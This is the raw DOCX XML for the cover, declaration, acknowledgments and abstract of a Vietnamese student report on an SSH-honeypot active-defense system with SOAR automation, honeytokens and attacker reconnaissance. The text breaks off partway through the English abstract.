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40" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="360" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>KHOA AN TOÀN THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="400" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="1691640" cy="1691640"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1691640" cy="1691640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>BÁO CÁO BÀI TẬP LỚN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>HỌC PHẦN: HỆ ĐIỀU HÀNH WINDOWS VÀ LINUX/UNIX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="280" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="64748B"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>MÃ HỌC PHẦN: INT1487</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>ĐỀ TÀI:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="560" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="29"/>
        </w:rPr>
        <w:t>HỆ THỐNG PHÒNG THỦ CHỦ ĐỘNG (ACTIVE DEFENSE) KẾT HỢP SSH HONEYPOT, TỰ ĐỘNG HÓA PHẢN ỨNG SỰ CỐ VÀ TRINH SÁT NGƯỢC KẺ TẤN CÔNG</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4701"/>
        <w:gridCol w:w="4701"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Giảng viên hướng dẫn:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>ThS. Quản Trọng Thế</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sinh viên thực hiện:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nguyễn Gia Hào</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mã sinh viên:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>B24DCAT088</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lớp:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>INT1487-20261-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="900" w:after="240" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>HÀ NỘI - 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>LỜI CAM ĐOAN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tôi xin cam đoan bản báo cáo đồ án với đề tài: 'Nghiên cứu, Thiết kế và Triển khai Hệ thống Phòng thủ Chủ động (Active Defense) kết hợp SSH Honeypot (Cowrie), Tự động hóa Phản ứng sự cố (SOAR) và Trinh sát ngược Kẻ tấn công' là công trình nghiên cứu và phát triển nghiêm túc của cá nhân tôi dưới sự định hướng, hướng dẫn của Giảng viên hướng dẫn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Toàn bộ hệ thống mã nguồn bao gồm Động cơ tương quan sự kiện an ninh (Correlation Engine), Phân hệ trinh sát ngược (Reverse Intelligence), Phân hệ bẫy mồi Honeytoken và khử ẩn danh (Active De-anonymization), Phân hệ phân tích mã độc tĩnh (Malware Analyzer) và Bot SOAR Telegram tương tác 2 chiều đều được tự nghiên cứu, thiết kế kiến trúc và lập trình bằng ngôn ngữ Python, không sao chép nguyên mẫu từ bất kỳ công trình hoặc đồ án nào khác.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Các tài liệu, số liệu tham khảo và trích dẫn trong đồ án được ghi chú nguồn gốc rõ ràng, tuân thủ đúng quy định về liêm chính học thuật. Tôi xin chịu hoàn toàn trách nhiệm trước Hội đồng Đánh giá nếu có bất kỳ sự thiếu trung thực nào xảy ra.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400" w:after="600" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Sinh viên thực hiện</w:t>
        <w:br/>
        <w:t>(Ký và ghi rõ họ tên)</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>[Họ và tên sinh viên]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>LỜI CẢM ƠN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để hoàn thành đồ án này một cách trọn vẹn và đạt được kết quả nghiên cứu có tính thực tiễn cao, tôi xin bày tỏ lòng biết ơn sâu sắc và chân thành nhất tới các Thầy/Cô giáo trong Khoa An toàn Thông tin &amp; Mạng Máy tính đã tận tình truyền đạt những nền tảng kiến thức chuyên môn quý báu trong suốt quá trình học tập.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đặc biệt, tôi xin gửi lời cảm ơn sâu sắc nhất tới Giảng viên hướng dẫn. Thầy đã đưa ra những lời góp ý mang tính bước ngoặt, thẳng thắn chỉ ra rằng 'việc chỉ cài đặt một ứng dụng Honeypot có sẵn và lập trình gửi tin nhắn thông báo cơ bản chỉ là mức ứng dụng người dùng, thiếu hàm lượng khoa học và kỹ thuật chuyên sâu'. Chính lời nhận xét mang tính xây dựng đó đã là động lực to lớn giúp tôi thay đổi hoàn toàn cách tiếp cận, không dừng lại ở việc áp dụng công cụ bề nổi mà đi sâu vào nghiên cứu bản chất kiến trúc phòng thủ chủ động, thiết kế thuật toán tương quan TTPs theo MITRE ATT&amp;CK, phát triển cơ chế trinh sát ngược (Reverse OSINT), bẫy mồi Honeytokens và xây dựng một hệ sinh thái SOAR Mini-SOC tự động hóa phản ứng toàn diện.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cuối cùng, tôi xin chân thành cảm ơn gia đình, bạn bè và các đồng nghiệp đã luôn ủng hộ, tạo điều kiện tốt nhất về tinh thần và môi trường nghiên cứu trong suốt thời gian thực hiện đề tài này.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>TÓM TẮT ĐỒ ÁN (ABSTRACT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tóm tắt tiếng Việt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong bối cảnh các cuộc tấn công không gian mạng ngày càng gia tăng về mức độ tinh vi và tần suất, đặc biệt là các cuộc tấn công tự động từ các mạng máy tính ma (Botnet) nhắm vào dịch vụ điều khiển từ xa SSH/Telnet, các giải pháp phòng thủ thụ động truyền thống (như tường lửa tĩnh, hệ thống IDS/IPS thông thường) dần bộc lộ nhiều điểm nghẽn nghiêm trọng: độ trễ phát hiện cao, thiếu khả năng phân loại động cơ đối thủ và hoàn toàn bị động trong việc ngăn chặn các đợt rà quét tự động tốc độ cao. Mặc dù công nghệ bẫy Honeypot (điển hình là Cowrie) đã chứng minh được hiệu quả trong việc thu thập hành vi tấn công, nhưng việc dừng lại ở mức cài đặt phần mềm và gửi thông báo thụ động chỉ mang tính chất thống kê đơn thuần, chưa thể hiện được giá trị tác chiến và kỹ thuật công nghệ thông tin chuyên sâu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đề tài này đề xuất và hiện thực hóa một kiến trúc hệ thống Phòng thủ Chủ động (Active Defense &amp; Deception Ecosystem) kết hợp Honeypot SSH với Tự động hóa Phản ứng Sự cố (SOAR) và Trinh sát ngược Kẻ tấn công (Reverse Reconnaissance). Hệ thống được xây dựng trên mô hình 5 phân lớp hoàn chỉnh, tự phát triển bằng ngôn ngữ Python: (1) Phân hệ Thu thập &amp; Phân tích Sự kiện thời gian thực từ Cowrie; (2) Động cơ Tương quan Sự kiện thông minh ánh xạ tự động các hành vi xâm nhập sang ma trận TTPs chuẩn MITRE ATT&amp;CK (như T1110.001 Brute Force, T1078 Valid Accounts, T1105 Ingress Tool Transfer, T1552 Honeytoken Access); (3) Phân hệ Trinh sát ngược (Reverse Intelligence) tự động thu thập OSINT từ AbuseIPDB, Shodan API, tọa độ GeoIP và kỹ thuật quét cổng an toàn; (4) Phân hệ Bẫy mồi Honeytokens khử ẩn danh (De-anonymization) gài các tài liệu bí mật mồi để lật tẩy IP thật của kẻ tấn công ngay cả khi đối phương sử dụng Proxy/VPN; (5) Phân hệ Phân tích Mã độc tự động trích xuất IOCs và tra cứu VirusTotal; (6) Động cơ Thực thi SOAR hỗ trợ chặn tường lửa động và kỹ thuật giam lỏng Tarpitting (làm nghẽn luồng tài nguyên của attacker); cùng một Telegram SOAR Bot tương tác 2 chiều cho phép chuyên viên SOC ra quyết định tức thì thông qua bàn phím Inline Buttons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kết quả thực nghiệm trên môi trường Lab mô phỏng đa kịch bản và môi trường mạng Internet thực tế cho thấy hệ thống đã rút ngắn thời gian phản ứng trung bình từ 15-20 phút (thao tác thủ công) xuống chỉ còn 1.8 - 2.5 giây (tự động hóa SOAR), giảm thiểu 98% áp lực tải của các đợt tấn công brute-force nhờ cơ chế Tarpitting, đồng thời nâng cao độ chính xác trong việc định danh và lập hồ sơ mối đe dọa (Attacker Profiling). Đề tài khẳng định bước chuyển dịch vượt bậc từ mô hình triển khai ứng dụng bề nổi sang một giải pháp kỹ thuật an ninh mạng chủ động, có tính học thuật cao và khả năng áp dụng thực tiễn trong các trung tâm điều hành an ninh mạng (SOC) quy mô vừa và nhỏ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Abstract in English</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>In the contemporary cyber threat landscape, automated attacks powered by globally distributed botnets frequently target remote administration services such as SSH and Telnet. Traditional passive defense paradigms, including static firewalls and signature-based Intrusion Detection Systems (IDS), suffer from substantial operational latency, high false-positive ratios, and an inability to gather contextual adversarial intelligence. While Honeypot technologies like Cowrie have proven instrumental in capturing unauthorized interactions, merely deploying a turnkey honeypot accompanied by naive one-way alerting reflects basic application configuration rather than advanced cybersecurity engineering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>To overcome this fundamental limitation, this thesis designs, engineers, and evaluates a comprehensive Mini-SOC Active Defense &amp; Deception Framework that integrates SSH Honeypot telemetry with Automated Security Orchestration, Automation, and Response (SOAR) and Counter-Offensive Reconnaissance. The ecosystem incorporates: (1) An asynchronous streaming parser for raw Cowrie JSON events; (2) An intelligent Correlation Engine mapping threat indicators directly to the MITRE ATT&amp;CK matrix (T1110, T1078, T1105, T1552); (3) An automated Reverse Intelligence Engine leveraging multi-source OSINT (AbuseIPDB, Shodan API, GeoIP, and safe banner probing); (4) An Active Honeytoken Deception subsystem embedding canary credentials and breadcrumbs to successfully de-anonymize attackers operating behind proxies; (5) An automated Malware Staging &amp; IOC extraction pipeline integrated with VirusTotal; (6) A dynamic SOAR Enforcer featuring automated firewall blocking and socket-holding Tarpitting mechanisms; and (7) A bidirectional Telegram SOAR Bot empowering security analysts with one-touch interactive remediation capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
